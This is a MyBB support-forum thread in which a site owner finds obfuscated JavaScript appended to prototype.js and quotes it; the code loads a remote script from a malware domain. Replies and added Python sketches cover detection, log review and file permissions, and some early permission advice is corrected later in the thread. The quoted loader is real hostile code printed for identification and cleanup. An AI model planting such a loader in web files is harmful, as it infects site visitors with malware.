MyBB Community Forums

Full Version: prototype.js has been "violated"
Pages: 1 2 3
First off I'm not too familiar with security and scripts. So I apologize if my terminology is not correct.

Recently my site www.ej8squad.com has been violated by a script pointing to malware from "go00ogle.net". Google Chrome and Safari browsers flagged my site as having malware from "go00ogle.net". I had no idea what to do so I looked around and decided to replace everything in the "jscripts" folder with fresh copies. Luckily that seemed to fix the problem.

Well, it came back today. I contacted an admin of another site which is using phpbb. Anyway, he was nice enough to recommend I use Grep and download my entire site locally and run the query below.

grep advQuery C:\place_where_you_copied_your_website\*.* -r

He also told me to look for this code.

function advQuery()
{
    var Host="http://google.com/";Track="/if.php";get=unescape("%6E%65%74");
    document.write(unescape("%3Cscript src='"+Host.substr(0,9)+unescape("\u0030\u0030")+Host.substr(9,5)+get));
    document.write(unescape(Track+"' type='text/javascript'%3E%3C/script%3E"));
}
;advQuery();

I ran grep and found the bad code in ".\jscripts\prototype.js". Uploaded a fresh copy and according to Firefox add-on NoScript the script is not loading anymore.

How can I stop from getting infected for a third time? Is this a bug in MyBB or a poorly written plugin?

Thanks for reading,

Jeremy
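
An added example, not part of the original post: the grep above only finds a loader that keeps the name advQuery, so this Python sketch compares every .js file against a clean copy of the same release and also flags the document.write(unescape( shape of the quoted code. The directory layout, the function names and the sample file contents are assumptions made for the illustration.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Loader shape quoted in the thread: document.write(unescape("%3Cscript ...
INJECT_RE = re.compile(r"document\.write\s*\(\s*unescape\s*\(", re.I)

def sha256(path):
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()

def compare_trees(live_root, clean_root, pattern="*.js"):
    """Map each live file that is absent from, or differs from, the clean copy to a status."""
    live_root, clean_root = Path(live_root), Path(clean_root)
    findings = {}
    for live in sorted(live_root.rglob(pattern)):
        rel = live.relative_to(live_root)
        clean = clean_root / rel
        if not clean.is_file():
            status = "not in clean copy"
        elif sha256(live) != sha256(clean):
            status = "modified"
        else:
            continue  # byte-identical to the clean release
        if INJECT_RE.search(live.read_text(errors="replace")):
            status += "; document.write(unescape( found"
        findings[rel.as_posix()] = status
    return findings

def demo():
    """Build two constructed trees (clean release vs. downloaded site) and compare them."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, live = Path(tmp, "clean/jscripts"), Path(tmp, "live/jscripts")
        for d in (clean, live):
            d.mkdir(parents=True)
            (d / "prototype.js").write_text("var Prototype = {};\n")
            (d / "general.js").write_text("var MyBB = {};\n")
        # Constructed stand-in for the appended loader; the URL is a placeholder.
        with (live / "prototype.js").open("a") as fh:
            fh.write("document.write(unescape('%3Cscript src=PLACEHOLDER%3E'));\n")
        (live / "extra.js").write_text("// file that the release does not ship\n")
        return compare_trees(live.parent, clean.parent)

if __name__ == "__main__":
    for path, status in demo().items():
        print(path, "->", status)
```
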
it would be best if you actually investigated and located the real source of the problem, i.e. who added this and how. if you remember the timestamp of the modified jscript file, checking the access.log for that time may be a good start.

otherwise do the following:

change all your ftp / ssh / database passwords.

check all your files, if in doubt reupload.

chmod all your files and folders to minimal settings. MyBB needs to be able to write only a very few files / folders. everything else should be read-only (e.g. chmod 555 instead of 777). this way you'd prevent even a poorly written plugin from changing anything with those files, since they lack permissions to change anything.
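
An added example, not part of the original post: one way to follow the access.log advice above is to pull every request that falls within a few minutes of the altered file's modification time and list the non-GET requests first. The log lines, IP addresses, paths and the modification time are constructed; the Apache common/combined log format is assumed.

```python
import re
from datetime import datetime, timedelta, timezone

# Apache common/combined format: ip ident user [time] "METHOD path proto" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None  # skip lines that are not in the expected format
    ip, ts, method, path, status = m.groups()
    when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": ip, "time": when, "method": method, "path": path, "status": int(status)}

def requests_near(lines, modified_at, window_minutes=5):
    """Return parsed entries within +/- the window around the file's modification
    time, with state-changing methods (anything but GET/HEAD) sorted first."""
    window = timedelta(minutes=window_minutes)
    hits = [e for e in map(parse_line, lines)
            if e and abs(e["time"] - modified_at) <= window]
    hits.sort(key=lambda e: (e["method"] in ("GET", "HEAD"), e["time"]))
    return hits

# Constructed sample: documentation-range IPs, made-up paths and times.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Jun/2009:13:40:02 +0000] "GET /index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [12/Jun/2009:14:01:55 +0000] "GET /jscripts/prototype.js?ver=1400 HTTP/1.1" 200 129738',
    '203.0.113.5 - - [12/Jun/2009:14:03:11 +0000] "POST /example/upload.php HTTP/1.1" 200 312',
    'this line is not in log format',
    '192.0.2.10 - - [12/Jun/2009:14:30:00 +0000] "GET /index.php HTTP/1.1" 200 5120',
]
# Constructed modification time; on a live system take it from os.stat(path).st_mtime.
MODIFIED_AT = datetime(2009, 6, 12, 14, 3, 20, tzinfo=timezone.utc)

if __name__ == "__main__":
    for e in requests_near(SAMPLE_LOG, MODIFIED_AT):
        print(e["time"].isoformat(), e["ip"], e["method"], e["path"], e["status"])
```

The modification time is lost once a fresh copy is uploaded over the file, so record it before replacing anything. A change made over FTP appears in the FTP server's log rather than in access.log.
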
Thanks for the tips sir. Unfortunately my current skills do not allow me to track down how they "got in". But I am willing to learn and would love to find out who/how/where they got in.

I have since then changed my ftp / ssh passwords. I have not changed any database passwords which I will do now.

chmod the files to 555 is a good idea. Any idea which ones MyBB needs to write to?
(2009-06-12, 06:04 PM) gimmezell wrote: chmod the files to 555 is a good idea. Any idea which ones MyBB needs to write to?

./inc/settings.php, ./cache/, ./cache/themes/, ./uploads/, ./uploads/avatars/, ./admin/backups/ if you want to use that feature, language files to edit them via the ACP.
(2009-06-12, 06:13 PM) MattRogowski wrote: ./inc/settings.php, ./cache/, ./cache/themes/, ./uploads/, ./uploads/avatars/, ./admin/backups/ if you want to use that feature, language files to edit them via the ACP.

Thanks Matt. So the above files and folders should have what chmod setting, 666?
Everything else could be set at 555?
settings.php needs to be 666, the rest need to be 777 because they're folders. All the other files can be 444 if you're really paranoid, not sure what the lowest a folder can be is though.
Not sure what I did when I chmod the "jscripts" folder, but I appear to have lost all javascript ability. When viewing a template in the ACP I don't have the drop down box anymore. Only choice I have is "edit".

I feel like an idiot. What did I do here?
555 on a folder means anyone can cd into it and read (but not write / create files).

this should be sufficient for any static files that aren't supposed to be changed, but I forgot that some webservers may have something set up that makes them refuse to look at anything that does not have standard chmod settings.

setting files and folders to minimum chmod (i.e. world even to 0) is something I would do on my root server, but it's probably bad advice to give to someone who uses unknown hosting or who doesn't understand linux file permissions. Sorry for giving this advice, I wasn't thinking.

It seems that your webserver believes it no longer has permission to read the files in your jscripts folder. Either because it is set up in a way to do so if you set chmod to minimum settings, or because you set it too low.

try accessing the file directly to see the error:
http://www.ej8squad.com/jscripts/prototype.js?ver=1400
No worries frostschultz. Your intentions were good.

The permissions on the "jscripts" is currently set at 644. I cannot access the file directly. I get a "403 Forbidden" error.

I did change the password of the MyBB database via my webserver control panel. I also changed the "config.php" to reflect the change. Did doing so somehow screw up my javascript?
folders need the execute bit (1) so make that 755
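
An added example, not part of the original posts: a Python audit that reports the two permission mistakes this thread runs into, a folder without the execute bit (the 403 on jscripts at 644) and files or folders left group/world-writable outside the list of paths MyBB has to write. It assumes the web server reads the files through the "other" permission bits, as the 777/666 advice above implies; the function names are this example's own.

```python
import os
import stat

# Paths MyBB must be able to write, as listed in the thread (relative to the forum root).
WRITABLE = {"inc/settings.php", "cache", "cache/themes", "uploads",
            "uploads/avatars", "admin/backups"}

def check_mode(rel, mode, is_dir, writable=WRITABLE):
    """Return a list of problems for one path, given its permission bits."""
    problems = []
    perms = stat.S_IMODE(mode)
    if is_dir and not perms & stat.S_IXOTH:
        # The thread's 403: a folder at 644 can be listed by nobody but its owner
        # and traversed by no one, so the files inside it are unreachable.
        problems.append("directory lacks execute bit for 'other' (%o): expect 403" % perms)
    if not perms & stat.S_IROTH:
        problems.append("not readable by 'other' (%o)" % perms)
    if perms & (stat.S_IWGRP | stat.S_IWOTH) and rel not in writable:
        problems.append("group/world-writable (%o) but not on the writable list" % perms)
    return problems

def audit_tree(root):
    """Walk a forum root and map each problematic relative path to its problems."""
    report = {}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            try:
                st = os.lstat(full)
            except OSError as exc:
                report[rel] = ["cannot stat: %s" % exc.strerror]
                continue
            problems = check_mode(rel, st.st_mode, stat.S_ISDIR(st.st_mode))
            if problems:
                report[rel] = problems
    return report

if __name__ == "__main__":
    import sys
    for rel, problems in sorted(audit_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items()):
        print(rel, "->", "; ".join(problems))
```
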